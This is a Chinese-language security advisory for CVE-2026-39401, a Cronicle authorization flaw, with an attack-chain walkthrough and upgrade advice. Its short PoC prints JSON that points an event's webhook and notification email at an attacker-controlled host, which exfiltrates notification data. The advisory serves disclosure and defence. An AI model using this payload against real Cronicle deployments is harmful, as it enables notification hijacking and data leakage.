CVE-2026-39401 CVSS 5.4 中危

CVE-2026-39401 Cronicle权限提升漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39401

漏洞类型

权限提升

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Cronicle

漏洞概述

Cronicle是一个基于Web的多服务器任务调度器。在0.9.111版本之前，其子进程可以在JSON输出中包含update_event键。服务器在接收到此输出时，未进行任何授权检查便将其直接应用到父事件的存储配置中。这一漏洞导致拥有创建和运行事件权限的低权限用户，能够修改任意事件属性，包括webhook URL和通知电子邮件，从而造成安全隐患。

技术细节

该漏洞的核心在于Cronicle服务器处理子进程返回数据时的权限校验缺失。具体而言，当用户调度并执行任务时，子进程会向服务器返回执行结果，格式通常为JSON。攻击者利用低权限账户创建任务，并在任务脚本中精心构造输出数据，插入`update_event`字段。服务器端代码在处理该字段时，直接将其合并到父事件对象的配置中，完全绕过了ACL（访问控制列表）检查。这使得攻击者能够篡改诸如Webhook URL、通知邮箱等关键配置，进而可能劫持任务通知或导致数据泄露，实现从低权限到高权限的跨越。

攻击链分析

STEP 1

1. 获取低权限账号

攻击者注册或获取一个具有创建和运行事件权限的低权限用户账号。

STEP 2

2. 创建恶意任务

攻击者创建一个新的Event（事件），并配置该事件运行由攻击者控制的脚本或命令。

STEP 3

3. 执行并输出Payload

任务运行时，脚本向标准输出（stdout）打印包含'update_event'键的恶意JSON数据，旨在修改webhook或邮件配置。

STEP 4

4. 服务器解析与应用

Cronicle主服务器接收到子进程的输出，解析JSON，并无授权检查地将'update_event'的内容合并到父Event的配置中。

STEP 5

5. 完成权限提升

Event的敏感配置被篡改，后续的通知或触发将发送至攻击者指定的地址，造成信息泄露或进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC Concept: Malicious Job Output // To exploit this, a low-privilege user creates a job that prints the following JSON to stdout. const payload = { "code": 0, "update_event": { "web_hook_url": "https://attacker-controlled-site.com/collect", "notification_email": "[email protected]" } }; console.log(JSON.stringify(payload)); // When Cronicle processes this output, it will update the parent event's configuration // with the attacker's webhook URL without checking authorization.

影响范围

Cronicle < 0.9.111

防御指南

临时缓解措施

建议立即将Cronicle升级到0.9.111版本以修复此漏洞。如果暂时无法升级，应严格限制非管理员用户创建和执行任务的权限，并仔细审查任务脚本的输出内容，防止其包含用于更新配置的恶意JSON字段。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表